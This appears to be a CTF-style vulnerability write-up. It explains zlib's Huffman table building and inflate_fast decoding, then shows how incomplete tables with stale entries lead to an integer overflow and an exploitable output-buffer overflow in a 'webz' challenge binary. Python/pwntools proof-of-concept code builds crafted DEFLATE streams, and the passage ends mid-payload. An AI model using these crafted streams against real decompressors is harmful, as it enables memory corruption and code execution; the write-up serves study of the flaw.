
The key idea of Base/Extra: values like 20 (and the range 19 + 0b00 ~ 0b11) are all represented by the same Huffman symbol (index 269); the exact value is determined by reading the extra bits. The table groups ranges by base and uses extra bits to resolve within the range.

        /* replicate for those indices with low len bits equal to huff */
        incr = 1U << (len - drop);
        fill = 1U << curr;
        min = fill;                 /* save offset to next table */
        do {
            fill -= incr;
            next[(huff >> drop) + fill] = here;
        } while (fill != 0);

        /* backwards increment the len-bit code huff */
        incr = 1U << (len - 1);
        while (huff & incr)
            incr >>= 1;
        if (incr != 0) {
            huff &= incr - 1;
            huff += incr;
        }
        else
            huff = 0;

        /* go to next symbol, update count, len */
        sym++;
        if (--(count[len]) == 0) {
            if (len == max) break;
            len = lens[work[sym]];
        }

After creating a code entry, we write it into the table at multiple positions. drop is used for sub-tables (multi-level); it’s 0 in the primary table.

The loop writes here into next[huff + (0, incr, incr*2, …, fill-incr)]. Before explaining why, let’s note something important:

A -> 00
B -> 01
C -> 10
D -> 110
E -> 111

If we naively stored:

next[0(0b00)] = here(op=0, bits=2, val='A')
next[1(0b01)] = here(op=0, bits=2, val='B')
next[2(0b10)] = here(op=0, bits=2, val='C')
next[6(0b110)] = here(op=0, bits=3, val='D')
next[7(0b111)] = here(op=0, bits=3, val='E')

that looks reasonable—but it’s wrong.

Consider compressing “CB”:

0b10(C) << 0 + 0b01(B) << 2 = 0b0110

Bits are packed least significant bit first; simply concatenating as 0b1001 would make bitwise decoding impossible.

The compressed bits for CB (0b0110) match those for D (0b110). Even though the code set is prefix-free when read left-to-right, Deflate uses a bitstream where the trailing bits act as prefixes due to LSB-first packing. To handle this, we reverse the bit order when building indices:

next[0(0b00)] = here(op=0, bits=2, val='A')
next[2(0b10)] = here(op=0, bits=2, val='B')
next[1(0b01)] = here(op=0, bits=2, val='C')
next[3(0b011)] = here(op=0, bits=3, val='D')
next[7(0b111)] = here(op=0, bits=3, val='E')

So the correct index order is 0,2,1,3,7 rather than 0,1,2,6,7.

        /* replicate for those indices with low len bits equal to huff */
        incr = 1U << (len - drop);
        fill = 1U << curr;
        min = fill;                 /* save offset to next table */
        do {
            fill -= incr;
            next[(huff >> drop) + fill] = here;
        } while (fill != 0);

Back to the loop. huff holds the (bit-reversed) Huffman code in progress. We don’t just store at next[huff]; we fill out all positions differing only in the unused high bits of the primary table.

fill is 1 << curr (table size), and incr is 1 << len (or 1 << (len - drop) for sub-tables). So the effect is:

If the primary table has curr=root bits, and huff=0b111 with code length 3, then fill covers:

0b00111
0b01111
0b10111
0b11111

We’re enumerating the higher bits that are irrelevant to this code length. This allows constant-time decoding:

next[0(0b00), 4(0b100)] = here(op=0, bits=2, val='A')
next[2(0b10), 6(0b110)] = here(op=0, bits=2, val='B')
next[1(0b01), 6(0b101)] = here(op=0, bits=2, val='C')
next[3(0b011)] = here(op=0, bits=3, val='D')
next[7(0b111)] = here(op=0, bits=3, val='E')

When decoding AC (0b0100), we can immediately index next[0b100] with BITS(root) and decode ‘A’ without checking code lengths; then drop 2 bits and continue.

Back to the actual decoding:

here = state->lencode[BITS(state->lenbits)];

This implements the same idea: index with fixed lenbits and decode immediately. The while loop plus fill/incr achieve this optimization.

        /* backwards increment the len-bit code huff */
        incr = 1U << (len - 1);
        while (huff & incr)
            incr >>= 1;
        if (incr != 0) {
            huff &= incr - 1;
            huff += incr;
        }
        else
            huff = 0;

This updates huff in bit-reversed order:

00,01,10,110,111 -> X
00,10,01,011,111 -> O

i.e., increment with bit-reversed semantics.

        /* go to next symbol, update count, len */
        sym++;
        if (--(count[len]) == 0) {
            if (len == max) break;
            len = lens[work[sym]];
        }

Move to the next symbol and update the working code length.

        /* create new sub-table if needed */
        if (len > root && (huff & mask) != low) {
            /* if first time, transition to sub-tables */
            if (drop == 0)
                drop = root;

            /* increment past last table */
            next += min;            /* here min is 1 << curr */

            /* determine length of next table */
            curr = len - drop;
            left = (int)(1 << curr);
            while (curr + drop < max) {
                left -= count[curr + drop];
                if (left <= 0) break;
                curr++;
                left <<= 1;
            }

            /* check for enough space */
            used += 1U << curr;

            /* point entry in root table to sub-table */
            low = huff & mask;
            (*table)[low].op = (unsigned char)curr;
            (*table)[low].bits = (unsigned char)root;
            (*table)[low].val = (unsigned short)(next - *table);
        }
    }

This creates a sub-table when len > root.

Let’s illustrate with the earlier example:

next[0(0b00), 4(0b100)] = here(op=0, bits=2, val='A')
next[2(0b10), 6(0b110)] = here(op=0, bits=2, val='B')
next[1(0b01), 5(0b101)] = here(op=0, bits=2, val='C')
next[3(0b011)] = here(op=0, bits=3, val='D')
next[7(0b111)] = here(op=0, bits=3, val='E')

Assume root=2 (for illustration), so 3‑bit codes require a sub-table.

Due to default state->lenbits, you wouldn’t actually see root=2 with multi-level tables in practice; we’re using small numbers for clarity.

next[0(0b00)] = here(op=0, bits=2, val='A')
next[2(0b10)] = here(op=0, bits=2, val='B')
next[1(0b01)] = here(op=0, bits=2, val='C')

Codes of length ≤2 fit in the primary table.

            if (drop == 0)
                drop = root;

            /* increment past last table */
            next += min;            /* here min is 1 << curr */

We set drop (the number of lower bits to ignore when indexing sub-tables) and advance next to the end of the current table—this is where the sub-table will live.

Now the sub-table is ready: next points to it, and drop=root causes future huff indices to ignore the lower root bits.

On subsequent iterations, entries for the longer codes are placed into the sub-table:

next += 1 << curr
next[0(0b011 >> 2)] = here(op=0, bits=1 (3-2), val='D')
next[1(0b111 >> 2)] = here(op=0, bits=1 (3-2), val='E')

Note here.bits = len - drop, so the sub-table stores only the remaining bits.

            /* point entry in root table to sub-table */
            low = huff & mask;
            (*table)[low].op = (unsigned char)curr;
            (*table)[low].bits = (unsigned char)root;
            (*table)[low].val = (unsigned short)(next - *table);

We also write into the primary table an entry that points to the sub-table. The final multi-level table looks like:

next[0(0b00)] = here(op=0, bits=2, val='A')
next[2(0b10)] = here(op=0, bits=2, val='B')
next[1(0b01)] = here(op=0, bits=2, val='C')

next[3(0b011 & mask( (1 << 2) - 1) )] = here(op=2, bits=2, val=4)

next += 1 << curr
next[0(0b011 >> 2)] = here(op=0, bits=1 (3-2), val='D')
next[1(0b111 >> 2)] = here(op=0, bits=1 (3-2), val='E')

Decoding a 3‑bit code like ‘E’ works like this: first-level lookup at 0b011 & mask = 0b11 yields here(op=2, bits=2, val=4), so we consume 2 bits and jump to the sub-table (next += 4). Then we use the next bit (1) to index the sub-table, yielding here(op=0, bits=1, val='E'); we consume 1 bit and emit ‘E’.

    /* fill in remaining table entry if code is incomplete (guaranteed to have
       at most one remaining entry, since if the code is incomplete, the
       maximum code length that was allowed to get this far is one bit) */
    if (huff != 0) {
        here.op = (unsigned char)64;            /* invalid code marker */
        here.bits = (unsigned char)(len - drop);
        here.val = (unsigned short)0;
        next[huff] = here;
    }

    /* set return parameters */
    *table += used;
    *bits = root;
    return 0;

Finally, if the code set is incomplete, the remaining entry is filled with an invalid code marker, then bits is updated and the function returns.

3-3. Decode

void ZLIB_INTERNAL inflate_fast(z_streamp strm, unsigned start) {
    struct inflate_state FAR *state;
    z_const unsigned char FAR *in;      /* local strm->next_in */
    z_const unsigned char FAR *last;    /* have enough input while in < last */
    unsigned char FAR *out;     /* local strm->next_out */
    unsigned char FAR *beg;     /* inflate()'s initial strm->next_out */
    unsigned char FAR *end;     /* while out < end, enough space available */
#ifdef INFLATE_STRICT
    unsigned dmax;              /* maximum distance from zlib header */
#endif
    unsigned wsize;             /* window size or zero if not using window */
    unsigned whave;             /* valid bytes in the window */
    unsigned wnext;             /* window write index */
    unsigned char FAR *window;  /* allocated sliding window, if wsize != 0 */
    unsigned long hold;         /* local strm->hold */
    unsigned bits;              /* local strm->bits */
    code const FAR *lcode;      /* local strm->lencode */
    code const FAR *dcode;      /* local strm->distcode */
    unsigned lmask;             /* mask for first level of length codes */
    unsigned dmask;             /* mask for first level of distance codes */
    code const *here;           /* retrieved table entry */
    unsigned op;                /* code bits, operation, extra bits, or */
                                /*  window position, window bytes to copy */
    unsigned len;               /* match length, unused bytes */
    unsigned dist;              /* match distance */
    unsigned char FAR *from;    /* where to copy match from */

    /* copy state to local variables */
    state = (struct inflate_state FAR *)strm->state;
    in = strm->next_in;
    last = in + (strm->avail_in - 5);
    out = strm->next_out;
    beg = out - (start - strm->avail_out);
    end = out + (strm->avail_out - 257);
#ifdef INFLATE_STRICT
    dmax = state->dmax;
#endif
    wsize = state->wsize;
    whave = state->whave;
    wnext = state->wnext;
    window = state->window;
    hold = state->hold;
    bits = state->bits;
    lcode = state->lencode;
    dcode = state->distcode;
    lmask = (1U << state->lenbits) - 1;
    dmask = (1U << state->distbits) - 1;

Time to analyze inflate_fast.

    do {
        if (bits < 15) {
            hold += (unsigned long)(*in++) << bits;
            bits += 8;
            hold += (unsigned long)(*in++) << bits;
            bits += 8;
        }
.....
.....
.....
    } while (in < last && out < end);

It loops until the preconditions fail. At the start of each iteration, if fewer than 15 bits are available in hold, it preloads 16 bits. This reduces overhead in the inner loop.

        here = lcode + (hold & lmask);
      dolen:
        op = (unsigned)(here->bits);
        hold >>= op;
        bits -= op;
        op = (unsigned)(here->op);
        if (op == 0) {                          /* literal */
            Tracevv((stderr, here->val >= 0x20 && here->val < 0x7f ?
                    "inflate:         literal '%c'\n" :
                    "inflate:         literal 0x%02x\n", here->val));
            *out++ = (unsigned char)(here->val);
        }
        else if (op & 16) {                     /* length base */
            len = (unsigned)(here->val);
            op &= 15;                           /* number of extra bits */
            if (op) {
                if (bits < op) {
                    hold += (unsigned long)(*in++) << bits;
                    bits += 8;
                }
                len += (unsigned)hold & ((1U << op) - 1);
                hold >>= op;
                bits -= op;
            }
            Tracevv((stderr, "inflate:         length %u\n", len));
            if (bits < 15) {
                hold += (unsigned long)(*in++) << bits;
                bits += 8;
                hold += (unsigned long)(*in++) << bits;
                bits += 8;
            }

The logic mirrors inflate.c: look up a code in lcode. If it’s a literal, emit it and continue; if it’s a length, decode the length and then decode the distance next, preloading more bits first.

            here = dcode + (hold & dmask);
          dodist:
            op = (unsigned)(here->bits);
            hold >>= op;
            bits -= op;
            op = (unsigned)(here->op);
            if (op & 16) {                      /* distance base */
                dist = (unsigned)(here->val);
                op &= 15;                       /* number of extra bits */
                if (bits < op) {
                    hold += (unsigned long)(*in++) << bits;
                    bits += 8;
                    if (bits < op) {
                        hold += (unsigned long)(*in++) << bits;
                        bits += 8;
                    }
                }
                dist += (unsigned)hold & ((1U << op) - 1);
#ifdef INFLATE_STRICT
                if (dist > dmax) {
                    strm->msg = (z_const char *)"invalid distance too far back";
                    state->mode = BAD;
                    break;
                }
#endif
                hold >>= op;
                bits -= op;
                Tracevv((stderr, "inflate:         distance %u\n", dist));

Distance decoding follows. After that, the LZ77 copy routine (not shown here) copies bytes from the window; the code is messy because it optimizes for various cases.

            else if ((op & 64) == 0) {          /* 2nd level distance code */
                here = dcode + here->val + (hold & ((1U << op) - 1));
                goto dodist;
            }
            else {
                strm->msg = (z_const char *)"invalid distance code";
                state->mode = BAD;
                break;
            }
        }
        else if ((op & 64) == 0) {              /* 2nd level length code */
            here = lcode + here->val + (hold & ((1U << op) - 1));
            goto dolen;
        }
        else if (op & 32) {                     /* end-of-block */
            Tracevv((stderr, "inflate:         end of block\n"));
            state->mode = TYPE;
            break;
        }
        else {
            strm->msg = (z_const char *)"invalid literal/length code";
            state->mode = BAD;
            break;
        }

After the LZ77 copy, the code handles second-level table lookups and invalid codes.

4. Vulnerability

We analyzed the principal parts of Inflate, the decoder for Deflate. Do you see the bug? Everything looks well designed.

4-1. Unintialized Huffman Code Table

There’s a subtle issue in the Huffman table construction. A Huffman table can be incomplete. For example, if root is 8 and the maximum code length is 10, there will be no entries for length‑9 codes; i.e., some table entries remain unset. Are such NULL entries handled correctly during decoding?

// inflate.c
            if (here.op & 64) {
                strm->msg = (z_const char *)"invalid literal/length code";
                state->mode = BAD;
                break;
            }
...
            if (here.op & 64) {
                strm->msg = (z_const char *)"invalid distance code";
                state->mode = BAD;
                break;
            }

// inftrees.c
    if (huff != 0) {
        here.op = (unsigned char)64;            /* invalid code marker */
        here.bits = (unsigned char)(len - drop);
        here.val = (unsigned short)0;
        next[huff] = here;
    }

No. As we’ve seen, incomplete entries should be filled with op=64 (invalid).

As a result, any NULL entries get treated as if they were code structures with op=0, bits=0, val=0. Or, they may retain stale values from a previous block.

4-2. Exploiting inflate_fast

To achieve high speed, inflate_fast omits many checks; it can therefore cause memory corruption when encountering incomplete Huffman tables. Let’s explore how.

The first memory bug identified was an integer overflow, but it wasn’t exploitable. The second was a stream overflow, which we ultimately exploited. We’ll describe both.

4-2-1. Integer Overflow (Unexploitable)

Let’s see what happens when a zero‑initialized table entry (op=0, bits=0, val=0) is used in decoding.

      dolen:
        op = (unsigned)(here->bits);
        hold >>= op;
        bits -= op;
        op = (unsigned)(here->op);
        if (op == 0) {                          /* literal */
            Tracevv((stderr, here->val >= 0x20 && here->val < 0x7f ?
                    "inflate:         literal '%c'\n" :
                    "inflate:         literal 0x%02x\n", here->val));
            *out++ = (unsigned char)(here->val);
        }

In the literal path, a code with op=0, bits=0, val=0 consumes zero bits and decodes a null byte. Since no bits are consumed, inflate_fast would loop forever decoding that same entry.

    } while (in < last && out < end);

However, the loop is bounded by out < end, so no overflow occurs here.

      dolen:
        op = (unsigned)(here->bits);
        hold >>= op;
        bits -= op;
        ...
        else if (op & 16) {                     /* length base */
            len = (unsigned)(here->val);
            op &= 15;                           /* number of extra bits */
            if (op) {
                if (bits < op) {
                    hold += (unsigned long)(*in++) << bits;
                    bits += 8;
                }
                len += (unsigned)hold & ((1U << op) - 1);
                hold >>= op;
                bits -= op;
            }
            ...
        else if ((op & 64) == 0) {              /* 2nd level length code */
            here = lcode + here->val + (hold & ((1U << op) - 1));
            goto dolen;
        }

What about the length path? Because of the op checks, the code falls into the second-level table lookup. With zero bits consumed, it indexes the 0th entry again.

          dodist:
            op = (unsigned)(here->bits);
            hold >>= op;
            bits -= op;
            op = (unsigned)(here->op);
            if (op & 16) {                      /* distance base */
                dist = (unsigned)(here->val);
                op &= 15;                       /* number of extra bits */
                if (bits < op) {
                    hold += (unsigned long)(*in++) << bits;
                    bits += 8;
                    if (bits < op) {
                        hold += (unsigned long)(*in++) << bits;
                        bits += 8;
                    }
                }
            ....
            else if ((op & 64) == 0) {          /* 2nd level distance code */
                here = dcode + here->val + (hold & ((1U << op) - 1));
                goto dodist;
            }

Distance decoding behaves similarly, but worse: the second-level lookup jumps back into the distance decode path. The “0th table entry” behavior is dangerous, because the second-level lookup is designed to read a sub-table (with smaller bits), but instead it’s indexing the primary table. inflate_fast keeps at least 16 bits in hold and assumes no codes exceed 15 bits, so it omits checks. The erroneous “0th entry” lookup breaks this assumption.

Why are Huffman codes guaranteed ≤15 bits? Because the Code Huffman table itself can only encode lengths up to 15; longer lengths cannot be represented.

Consider:

Bit buffer size: 16 (minimum present)
Primary table root: 10
Maximum Huffman code length: 12

1. Normal second-level distance lookup -> uninitialized entry `op=0, bits=0, val=0` (bits: 16 - 10 = 6)
2. Abnormal second-level lookup -> 0th primary-table entry (bits: 6 - 0 = 6)
3. Decoding the 0th primary-table entry (bits: 6 - 10 = -2)

As noted, the distance path jumps back into distance decoding after the second-level lookup, so the primary table (not sub-table) is indexed next, consuming too many bits. Ultimately, the bits counter underflows—an integer overflow.

    /* return unused bytes (on entry, bits < 8, so in won't go too far back) */
    len = bits >> 3;
    in -= len;
    bits -= len << 3;
    hold &= (1U << bits) - 1;

    /* update state and return */
    strm->next_in = in;
    strm->next_out = out;
    strm->avail_in = (unsigned)(in < last ? 5 + (last - in) : 5 - (in - last));
    strm->avail_out = (unsigned)(out < end ?
                                 257 + (end - out) : 257 - (out - end));
    state->hold = hold;
    state->bits = bits;
    return;

At the end of inflate_fast, the code adjusts in/avail_in by the number of unused bits. Thus, the integer overflow in bits corrupts strm->next_in and strm->avail_in, affecting subsequent decoding.

4-2-2. PoC

import struct

class BitStream:
    """LSB-first bit stream writer."""
    def __init__(self):
        self.bits = 0
        self.bit_count = 0
        self.data = bytearray()

    def write_bits(self, value, num_bits):
        for i in range(num_bits):
            bit = (value >> i) & 1
            if bit:
                self.bits |= (1 << self.bit_count)
            self.bit_count += 1
            if self.bit_count == 8:
                self.data.append(self.bits)
                self.bits = 0
                self.bit_count = 0

    def get_bytes(self):
        if self.bit_count > 0:
            self.data.append(self.bits)
        return self.data

def generate_huffman_codes_from_lengths(lengths):
    max_len = 0
    for length in lengths:
        if length > max_len:
            max_len = length
    
    if max_len == 0:
        return {}

    bl_count = [0] * (max_len + 1)
    for length in lengths:
        if length > 0:
            bl_count[length] += 1
    
    code = 0
    next_code = [0] * (max_len + 1)
    for bits_len in range(1, max_len + 1):
        code = (code + bl_count[bits_len - 1]) << 1
        next_code[bits_len] = code

    huffman_codes = {}
    for i, length in enumerate(lengths):
        if length != 0:
            rev_code = int(f'{next_code[length]:0{length}b}'[::-1], 2)
            huffman_codes[i] = (rev_code, length)
            next_code[length] += 1
    
    return huffman_codes

lbase = [3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 15, 17, 19, 23, 27, 31, 35, 43, 51, 59, 67, 83, 99, 115, 131, 163, 195, 227, 258]
lext = [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 0]
dbase = [1, 2, 3, 4, 5, 7, 9, 13, 17, 25, 33, 49, 65, 97, 129, 193, 257, 385, 513, 769, 1025, 1537, 2049, 3073, 4097, 6145, 8193, 12289, 16385, 24577]
dext = [0, 0, 0, 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8, 9, 9, 10, 10, 11, 11, 12, 12, 13, 13]
order = [16, 17, 18, 0, 8, 7, 9, 6, 10, 5, 11, 4, 12, 3, 13, 2, 14, 1, 15]

def find_len_sym(length):
    for i in range(len(lbase)):
        if lbase[i] > length:
            i -= 1
            break
    base_len = lbase[i]
    extra_bits = lext[i]
    extra_val = length - base_len
    return 257 + i, extra_bits, extra_val

def find_dist_sym(distance):
    for i in range(len(dbase)):
        if dbase[i] > distance:
            i -= 1
            break
    base_dist = dbase[i]
    extra_bits = dext[i]
    extra_val = distance - base_dist
    return i, extra_bits, extra_val

def encode_lengths_rle(lengths):
    encoded = []
    i = 0
    while i < len(lengths):
        current_len = lengths[i]
        
        if current_len == 0:
            count = 0
            while i + count < len(lengths) and lengths[i + count] == 0 and count < 138:
                count += 1
            if count >= 11:
                encoded.append((18, count - 11))
                i += count
                continue
            if count >= 3:
                encoded.append((17, count - 3))
                i += count
                continue

        if i > 0 and current_len == lengths[i - 1]:
            count = 0
            while i + count < len(lengths) and lengths[i + count] == current_len and count < 6:
                count += 1
            if count >= 3:
                encoded.append((16, count - 3))
                i += count
                continue

        encoded.append((current_len, None))
        i += 1
    return encoded

def create_dynamic_deflate_payload(stream, is_last, symbol_stream, ll_lengths, dist_lengths):
    
    nlen = max(i for i, length in enumerate(ll_lengths) if length > 0) + 1
    ndist = max(i for i, length in enumerate(dist_lengths) if length > 0) + 1
    
    all_lengths = ll_lengths[:nlen] + dist_lengths[:ndist]
    rle_encoded_lengths = encode_lengths_rle(all_lengths)
    
    rle_symbols = [item[0] for item in rle_encoded_lengths]
    code_symbol_freqs = {sym: rle_symbols.count(sym) for sym in set(rle_symbols)}
    
    code_table_lengths = [0] * 19
    for sym in code_symbol_freqs:
        code_table_lengths[sym] = 7
    
    ncode = max(i for i, length in enumerate(order) if code_table_lengths[length] > 0) + 1

    code_huffman_table = generate_huffman_codes_from_lengths(code_table_lengths)

    stream.write_bits(is_last, 1) # BFINAL
    stream.write_bits(2, 2) # BTYPE (10 for dynamic)

    stream.write_bits(nlen - 257, 5)
    stream.write_bits(ndist - 1, 5)
    stream.write_bits(ncode - 4, 4)

    for i in range(ncode):
        stream.write_bits(code_table_lengths[order[i]], 3)
        
    for sym, extra_val in rle_encoded_lengths:
        code, length = code_huffman_table[sym]
        stream.write_bits(code, length)
        if sym == 16: stream.write_bits(extra_val, 2)
        elif sym == 17: stream.write_bits(extra_val, 3)
        elif sym == 18: stream.write_bits(extra_val, 7)


    ll_huffman_table = generate_huffman_codes_from_lengths(ll_lengths)
    dist_huffman_table = generate_huffman_codes_from_lengths(dist_lengths)
    
    for type, val in symbol_stream:
        if type == 'LIT':
            code, length = ll_huffman_table[val]
            stream.write_bits(code, length)
        elif type == 'EOB':
            code, length = ll_huffman_table[val]
            stream.write_bits(code, length)
        elif type == 'LD':
            l, d = val
            len_sym, len_extra_bits, len_extra_val = find_len_sym(l)
            dist_sym, dist_extra_bits, dist_extra_val = find_dist_sym(d)
            
            code, length = ll_huffman_table[len_sym]
            stream.write_bits(code, length)
            if len_extra_bits > 0:
                stream.write_bits(len_extra_val, len_extra_bits)
            
            code, length = dist_huffman_table[dist_sym]
            stream.write_bits(code, length)
            if dist_extra_bits > 0:
                stream.write_bits(dist_extra_val, dist_extra_bits)
        elif type == 'INVALID':
            code, length = val
            stream.write_bits(code, length)


stream = BitStream()

# "AABCABC" -> 'A', 'A', 'B', 'C', (L=3, D=3), EOB
symbol_stream = [
    ('LIT', 65), ('LIT', 65), ('LIT', 66), ('LIT', 67),
    ('LD', (3, 3))
]

symbol_stream.append(("INVALID", (int('000000000000110'[::-1],2),15)))
symbol_stream.append(("INVALID", (int('000000001001'[::-1],2),12)))

symbol_stream.append(('EOB', 256))

for i in range(0,0x200):
    symbol_stream.append(('LIT', 65))

ll_lengths = [0] * 286
ll_lengths[65] = 15  # 'A'
ll_lengths[66] = 15  # 'B'
ll_lengths[67] = 15  # 'C'
ll_lengths[68] = 15  # 'D'
ll_lengths[69] = 15  # 'E'
ll_lengths[256] = 15 # EOB
ll_lengths[257] = 15 # Length 3

dist_lengths = [0] * 30
dist_lengths[2] = 10 # Distance 3
dist_lengths[3] = 10 # Distance 4
dist_lengths[4] = 12 # Distance 5

create_dynamic_deflate_payload(stream, 0, symbol_stream, ll_lengths, dist_lengths)
payload = stream.get_bytes()

print(f"Generated DEFLATE payload ({len(payload)} bytes):")
print(payload.hex())

from pwn import *

p = process("./src/webz_asan")

def send_webz_payload(pay):
    MAX_AROUND_WIDTH_HEIGHT = p8(0x0) + p8(52) + p8(0x0) + p8(52) # MAX = 52, 52
    p.send(p32(len(pay)+12))
    p.send(b"WEBZ"+MAX_AROUND_WIDTH_HEIGHT+b"\x00\x00\x00\x00"+pay)

send_webz_payload(payload)

p.interactive()

We reproduce the case described above. The Distance table has root=10 with a maximum code length of 12, so there are unfilled entries with op=0, bits=0, val=0. By crafting the stream to force a multilevel lookup, we can trigger the vulnerability.

    symbol_stream.append(("INVALID", (int('000000000000110'[::-1],2),15)))
    symbol_stream.append(("INVALID", (int('000000001001'[::-1],2),12)))

These are key. The first is a valid 15‑bit length code. The second is an invalid 12‑bit distance code.

dist_lengths[4] = 12 # Distance 5

The valid distance‑5 code is 000000001000. Instead, 000000001001 forces a second‑level lookup that reads an uninitialized code entry.

As a result, next_in/avail_in are corrupted.

However, this particular memory corruption was not exploitable. If we first decompress dummy data in block one, and then in a second block trigger the bug with a Literal/Length table that only contains EOB, we can corrupt next_in/avail_in without crashing. But since these are input stream variables (not output buffer variables), we couldn’t achieve an overflow or OOB write on the decompressed output buffer.

4-2-3. Buffer Overflow (Exploitable)

So what should we target to exploit uninitialized table entries? The most promising avenue in zlib is to abuse the copy routines. The stored-block copy and the LZ77 copy are powerful overwrite primitives—if we can disable the checks that constrain them.

In other words, we need to corrupt avail_out, not avail_in. Let’s inspect inflate_fast’s LZ77 decode.

        else if (op & 16) {                     /* length base */
            len = (unsigned)(here->val);
            op &= 15;                           /* number of extra bits */
            if (op) {
                if (bits < op) {
                    hold += (unsigned long)(*in++) << bits;
                    bits += 8;
                }
                len += (unsigned)hold & ((1U << op) - 1);
                hold >>= op;
                bits -= op;
            }
            Tracevv((stderr, "inflate:         length %u\n", len));
            if (bits < 15) {
                hold += (unsigned long)(*in++) << bits;
                bits += 8;
                hold += (unsigned long)(*in++) << bits;
                bits += 8;
            }
            here = dcode + (hold & dmask);
          dodist:
            op = (unsigned)(here->bits);
            hold >>= op;
            bits -= op;
            op = (unsigned)(here->op);
            if (op & 16) {                      /* distance base */
                dist = (unsigned)(here->val);
                op &= 15;                       /* number of extra bits */
                if (bits < op) {
                    hold += (unsigned long)(*in++) << bits;
                    bits += 8;
                    if (bits < op) {
                        hold += (unsigned long)(*in++) << bits;
                        bits += 8;
                    }
                }
                dist += (unsigned)hold & ((1U << op) - 1);
#ifdef INFLATE_STRICT
                if (dist > dmax) {
                    strm->msg = (z_const char *)"invalid distance too far back";
                    state->mode = BAD;
                    break;
                }
#endif
                hold >>= op;
                bits -= op;
                Tracevv((stderr, "inflate:         distance %u\n", dist));

The LZ77 decode in inflate_fast has almost no checks. The only guard is if (dist > dmax), behind INFLATE_STRICT.

How can it still be safe?

    static const unsigned short lbase[31] = { /* Length codes 257..285 base */
        3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 15, 17, 19, 23, 27, 31,
        35, 43, 51, 59, 67, 83, 99, 115, 131, 163, 195, 227, 258, 0, 0};
    static const unsigned short lext[31] = { /* Length codes 257..285 extra */
        16, 16, 16, 16, 16, 16, 16, 16, 17, 17, 17, 17, 18, 18, 18, 18,
        19, 19, 19, 19, 20, 20, 20, 20, 21, 21, 21, 21, 16, 73, 200};

The maximum copy length (LZ77 length) is lbase[28] (258) + ((lext[28] (16) & 15) == 0) → 258. Earlier we noted that inflate_fast is entered only when strm->avail_out >= 258, and the loop exits as soon as that’s no longer true. Thus, inflate_fast can safely omit length checks because it guarantees there are at least 258 bytes of space.

            state->next = state->codes;
            state->lencode = state->distcode = (const code FAR *)(state->next);
            state->lenbits = 7;
            ret = inflate_table(CODES, state->lens, 19, &(state->next),
                                &(state->lenbits), state->work);

In inflate, tables are written into state->codes, which is not cleared between blocks. The tables’ boundaries aren’t fixed either; state->next advances dynamically, so different blocks can lay out different tables at different offsets.

Therefore, stale entries from a previous block can persist in uninitialized slots of later tables—even of different types.

If a Distance-table entry from a previous block remains in an uninitialized slot of the subsequent Literal/Length table, we’re in trouble. Deflate limits lengths to 258, but distances can be much larger. If a stale Distance entry is misinterpreted as a Length entry in inflate_fast, its length can exceed 258, breaking the invariant that made inflate_fast safe.

    strm->avail_out = (unsigned)(out < end ?
                                 257 + (end - out) : 257 - (out - end));

Ultimately, when the LZ77 decode interprets a stale Distance entry as a Length, strm->avail_out suffers an integer overflow. Unlike avail_in, avail_out reflects the remaining size of the output buffer, so this immediately leads to a buffer overflow.

#define MAX_INPUT_SIZE 4096
#define MAX_OUTPUT_SIZE (MAX_INPUT_SIZE * 2)

typedef struct EncodedWebz {
    uint8_t data[MAX_INPUT_SIZE];
    size_t size;
} EncodedWebz;

typedef struct DecodedWebz {
    uint8_t data[MAX_OUTPUT_SIZE];
    size_t size;
} DecodedWebz;

typedef struct WebzState {
    EncodedWebz encoded;
    DecodedWebz decoded;
    z_stream infstream;
    char ok_status[5];
} WebzState;

WebzState webz_state;

The decompressed bytes are written into the global webz_state in webz.c. To actually corrupt memory, we must write more than 8192 bytes and overflow into the following z_stream infstream, overwriting its fields.

4-2-4. PoC

stream = BitStream()

# STORED BLOCK ===============================================================================
stream.write_bits(0, 1) # BFINAL
stream.write_bits(0, 2) # BTYPE (0 for stored)
stream.bytebits()
stored_block_length = 0x200
stream.write_bits(stored_block_length + ( (stored_block_length ^ 0xffff) << 16 ), 32) 
for i in range(0, stored_block_length):
    stream.write_bits(ord('X'), 8)
# STORED BLOCK ===============================================================================

# DYNAMIC BLOCK ==============================================================================
symbol_stream = [ ('EOB', 256) ]

ll_lengths = [0] * 286
ll_lengths[256] = 3 # EOB

dist_lengths = [0] * 30
for i in range(17,30):
    dist_lengths[i] = 15

create_dynamic_deflate_payload(stream, 0, symbol_stream, ll_lengths, dist_lengths)
# DYNAMIC BLOCK ==============================================================================

# DYNAMIC BLOCK ==============================================================================
symbol_stream = []

symbol_stream.append(("INVALID", (8,10)))
symbol_stream.append(("INVALID", (0b1111111,7))) # extra bits
symbol_stream.append(("INVALID", (int('000'[::-1],2),3)))
symbol_stream.append(("INVALID", (0b1111111,7))) # extra bits
symbol_stream.append(('EOB', 256))
ll_lengths = [0] * 286
ll_lengths[256] = 10 # EOB
ll_lengths[257] = 10 # Length 3
ll_lengths[258] = 12 # Length 4

dist_lengths = [0] * 30
dist_lengths[17] = 3 # Distance ???

create_dynamic_deflate_payload(stream, 0, symbol_stream, ll_lengths, dist_lengths)
# DYNAMIC BLOCK ==============================================================================

# STORED BLOCK ===============================================================================
stream.write_bits(0, 5) # dummy
stream.write_bits(0, 1) # BFINAL
stream.write_bits(0, 2) # BTYPE (0 for stored)
stream.bytebits()
stored_block_length = 0x10
stream.write_bits(stored_block_length + ( (stored_block_length ^ 0xffff) << 16 ), 32) 
for i in range(0, stored_block_length):
    stream.write_bits(ord('C'), 8)
# STORED BLOCK ===============================================================================

# DYNAMIC BLOCK ==============================================================================
symbol_stream = []
symbol_stream.append(('LIT', 65))
for i in range(0,0x2ce):
    symbol_stream.append(('LD', (10, 1)))
for i in range(0,7):
    symbol_stream.append(('LIT', 65))
symbol_stream.append(('EOB', 256))

ll_lengths = [0] * 286
ll_lengths[65] = 3  # 'A'
ll_lengths[256] = 3 # EOB
ll_lengths[264] = 3 # Length 10

dist_lengths = [0] * 30
dist_lengths[0] = 3 # Distance 1


create_dynamic_deflate_payload(stream, 0, symbol_stream, ll_lengths, dist_lengths)
# DYNAMIC BLOCK ==============================================================================

# STORED BLOCK ===============================================================================
overwrriten_infstream = b'X'*0x60

stream.write_bits(1, 1) # BFINAL
stream.write_bits(0, 2) # BTYPE (0 for stored)
